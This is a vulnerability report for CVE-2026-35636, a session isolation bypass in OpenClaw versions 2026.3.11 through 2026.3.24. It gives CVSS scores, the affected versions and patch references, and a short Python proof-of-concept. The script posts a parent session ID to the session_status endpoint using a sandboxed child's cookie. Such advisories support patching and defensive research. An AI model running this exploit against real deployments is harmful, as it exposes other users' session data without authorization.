Security Vulnerability Report
CVE-2026-35636 CVSS 6.5 MEDIUM

CVE-2026-35636

Published: 2026-04-09 22:16:33
Last Modified: 2026-04-16 20:48:34

Description

OpenClaw versions 2026.3.11 through 2026.3.24 contain a session isolation bypass vulnerability where session_status resolves sessionId to canonical session keys before enforcing visibility checks. Sandboxed child sessions can exploit this to access parent or sibling sessions that should be blocked by explicit sessionKey restrictions.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw 2026.3.11
OpenClaw 2026.3.12
OpenClaw 2026.3.13
OpenClaw 2026.3.14
OpenClaw 2026.3.15
OpenClaw 2026.3.16
OpenClaw 2026.3.17
OpenClaw 2026.3.18
OpenClaw 2026.3.19
OpenClaw 2026.3.20
OpenClaw 2026.3.21
OpenClaw 2026.3.22
OpenClaw 2026.3.23
OpenClaw 2026.3.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-35636 (OpenClaw Session Isolation Bypass)

This script demonstrates how a sandboxed child session might access
parent session data due to the resolution order vulnerability.
"""
import json

import requests


def exploit_poc(target_host, child_session_cookie, target_parent_id):
    """
    Attempts to resolve a parent session ID from a sandboxed child context.
    """
    url = f"{target_host}/api/session_status"

    # Headers simulating the sandboxed child session
    headers = {
        "Cookie": f"sessionId={child_session_cookie}",
        "Content-Type": "application/json",
    }

    # Payload containing the ID of the restricted parent session
    payload = {"sessionId": target_parent_id}

    print(f"[*] Attempting to resolve parent session ID: {target_parent_id}")
    print(f"[*] Using child session cookie: {child_session_cookie}")

    try:
        response = requests.post(url, headers=headers, json=payload, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print("[+] Potential Bypass Successful! Response received:")
            print(json.dumps(data, indent=2))
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] Response body: {response.text}")
            return False
    except Exception as e:
        print(f"[!] Error during request: {e}")
        return False


if __name__ == "__main__":
    # Example usage - replace with actual target details during testing
    TARGET = "http://localhost:8080"
    CHILD_SESSION = "sandbox_child_token_123"
    PARENT_ID = "restricted_parent_session_456"
    exploit_poc(TARGET, CHILD_SESSION, PARENT_ID)
```

References

Patch: https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de
Vendor Advisory: https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2
Third Party Advisory: https://www.vulncheck.com/advisories/openclaw-session-isolation-bypass-via-sessionid-resolution

Weakness: CWE-696
Secondary CVSS 4.0 score: 7.1 HIGH (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
Affected version range: 2026.3.11 (inclusive) to 2026.3.25 (exclusive)